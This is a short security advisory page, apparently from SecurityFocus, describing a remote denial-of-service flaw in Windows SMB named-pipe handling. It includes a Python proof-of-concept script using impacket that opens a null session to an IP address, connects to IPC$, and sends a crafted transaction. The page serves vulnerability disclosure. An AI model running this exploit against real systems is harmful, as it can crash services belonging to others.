Microsoft Windows SMB PIPE Remote Denial of Service Vulnerability

To exploit this issue, attackers employ standard networking tools.

The following Python script code by Gerardo Richarte <lists@core-sdi.com> is sufficient to demonstrate this issue:

from impacket import smb

s = smb.SMB('*SMBSERVER','10.0.1.44')
s.login('','')
tid = s.tree_connect_andx(r'\\*SMBSERVER\IPC$')
s.send_trans(tid, '\x01\x00\x00\x00\x00\x00', 'cuchicuchi','','')


 

Privacy Statement
Copyright 2010, SecurityFocus